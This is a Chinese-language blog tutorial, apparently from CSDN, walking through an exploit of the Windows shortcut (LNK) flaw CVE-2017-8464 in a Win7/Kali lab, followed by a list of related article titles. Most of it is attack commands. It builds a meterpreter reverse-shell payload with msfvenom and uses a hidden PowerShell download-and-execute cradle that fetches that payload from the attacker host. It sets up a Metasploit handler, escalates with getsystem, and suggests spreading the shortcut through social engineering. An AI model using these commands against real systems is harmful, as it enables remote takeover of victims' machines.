震网三代(CVE-2017-8464)

  • CVE-2017-8464
  • 环境准备
  • 利用原理
  • 漏洞利用
  • 后渗透

CVE-2017-8464

说明:
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危
传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

危害:
被攻击机插入存在攻击lnk的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。

环境准备

Win7:192.168.202.136


Kali:192.168.202.133

利用原理

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒,并且被远控。

漏洞利用

启动MSF
终端内输入:msfconsole

开始利用:
使用MSF创建一个后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.202.133 lport=4664 -f psh-reflection>/var/www/html/link.ps1

在kali下开启apache2
service apache2 start

通过社会学进行快捷方式传播
powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.202.133/link.ps1’);test.ps1”

回到MSF终端配置监听
use exploit/multi/handler
配置payload
set payload windows/x64/meterpreter/reverse_tcp
options

设置 LHOST 和 LPORT
set lhost <当前机器ip> 设置 LHOST
set lport <未被占用的端口> 设置 LPORT
最后在 输入 options 查看配置是否生效

执行监听

run 或者 exploit,在靶机上执行快捷方式
稍等片刻获取到meterpreter

后渗透

进入终端:shell

查看IP:ip a

发现有乱码
输入chcp 65001

退出,提权:getsystem

震网三代(CVE-2017-8464)相关推荐

  1. CVE-2017-8464(震网三代)漏洞分析与复现

    目录 一.CVE-2017-8464漏洞简介 1.简介 2.CVE-2017-8464漏洞原理 3.漏洞影响范围 二.复现环境 三.漏洞复现 1.kali下生成一个反弹的ps1的shell,文件名为s ...

  2. msf之使用震网三代来提权

    cve_2017_8464_lnk_lpe,他就是震网三代的exploit 上次没有成功将x64的搞定,现在搬来了震网三代 看我来个远程执行漏洞的提权 前面已经拿到shell,但没有system权限 ...

  3. CVE2017-8464:震网三代漏洞分析

    CVE2017-8464:震网三代漏洞分析(转) 转载 本文由Kilig原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/214846 安全 ...

  4. linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...

    0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...

  5. 震网三代 CVE-2017-8464 关于Powershell 漏洞复现

    漏洞原理: Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以l ...

  6. 震网三代漏洞复现(CVE-2017-8464)

    文章目录 影响版本 危害 漏洞原理 漏洞复现 任务环境 创建EXP 获取靶机权限 利用Powershell获取权限 修复建议 影响版本 Windows 7Windows 8.1Windows RT 8 ...

  7. 震网三代cve_2017_8464漏洞复现

    影响版本: windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 win ...

  8. php cve 2017 12933,18-017 (March 27, 2018)

    描述 * indicates a new version of an existing rule Deep Packet Inspection Rules: DCERPC Services - Cli ...

  9. CVE-2017-8464震网3.0漏洞分析与复现

    概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该 ...

  10. 2021年第一季度Sumap网络空间测绘CVE漏洞趋势安全分析报告

    前言 本文主要通过网络测绘角度收集各种资产协议的版本号信息,通过比对CVE漏洞影响范围中的版本号方式,进行安全风险趋势分析,无任何实际危害互联网行为.资产在携带版本中也会存在修复补丁后版本不变的情况. ...

最新文章

  1. C++的 STL堆 实现获取中位数
  2. 【开发工具】学习记录 初学MATLAB
  3. Fiddler抓包使用教程-扫盲篇
  4. MYSQL,Oracle,SQL数据库在JSP中的驱动
  5. 53pagecontext对象
  6. vue2学习计划1-2 浏览器跨域问题
  7. Java多线程详解(深究Thread类)
  8. ZOJ 2527题解
  9. C++ 对象没有显式初始化
  10. 第二章 对象以及变量的并发访问
  11. JS魔法堂:元素克隆、剪切技术研究
  12. 【Java 学习笔记】《Head First Java》——基本概念
  13. 高超声速飞行器的建模与控制器设计
  14. 台湾医院:自主研发移动护理系统 跟软件公司说拜拜
  15. IOS逆向学习-加壳、脱壳
  16. OPENSSL s_client 实例测试- SSL连接单向验证
  17. 2022-2028年中国光电广告产业竞争现状及发展趋势分析报告
  18. 像追女神一样学好java~
  19. 2019年2月18日,异常作业
  20. Electron修改窗口标题

热门文章

  1. su必备插件_21款SU常用插件集合
  2. DTCC 2020 | 阿里云李飞飞:云原生分布式数据库与数据仓库系统点亮数据上云之路
  3. JAVA创建内部类对象
  4. java 网页 录音_Java+FlashWavRecorder实现网页录音并上传【新】
  5. c++实现串口功能之termios.h头文件研读<二>
  6. JEOL:推出新型电子探针显微分析仪JXA-iHP200F和JXA-iSP100
  7. 揭秘百度新治理结构:马东敏的谣言与李彦宏的用人观
  8. 向日蔡远程连接锁定计算机,如何远程连接电脑?向日葵远程工具告诉你?
  9. Android EditText属性android:inputType类型介绍
  10. MATALB 卷积神经网络 图片二分类